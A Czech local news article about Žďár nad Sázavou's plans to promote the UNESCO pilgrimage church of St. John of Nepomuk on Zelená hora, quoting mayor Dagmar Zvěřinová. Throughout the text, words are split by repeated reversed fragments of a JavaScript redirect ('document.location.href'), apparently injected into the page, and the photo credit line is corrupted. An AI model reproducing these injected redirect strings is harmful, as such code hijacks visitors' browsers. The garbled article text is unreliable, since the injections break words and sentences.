kostel Zelená hora, propagace
Rainbow page separator

Žďár by uvítal větší propagaci kostela na Zelené hoře

Sobota, 11. října 2014

Zelená hora Žďár nad Sázavou, Santini, UNESCO

Žďár nad Sázavou / Užší spolupráci s římskoka[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tolickou církví, která je nyní majitelem poutního kostela svatého Jana Nepomuckého na Zelené hoře plánuje navázat žďárská radnice. „Předchozí dva roky ohledně památky UNESCO panovaly nejasnosti, takže se nic nového nedělo. Nyní hodláme jednat a s církví spolupracovat například při lepší propagaci kostela, případně co nejméně komplikovaném přístupu k němu,“ uvedla starostka Žďáru nad Sázavou Dagmar Zvěřinová.
Žďár kupříkladu plánuje navigační systém, který turistům umožní co nejjednodušší cestu až na Zelenou horu. Pozemky kolem ní patří městu a několika dalším vlastníkům, spolupracovat by při [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom měly všechny zainteresované subjekty.
„Památkový ústav například nechtěl, aby ke kostelu zajížděly au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tobusy. To si ale nedokážu představit, pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tože by [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to obtížně se pohybujícím seniorům znemožňovalo návštěvu kostela,“ dodala starostka.

Fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to: [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to.com/“ target=“_blank“>www.dajc-naturepho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to.com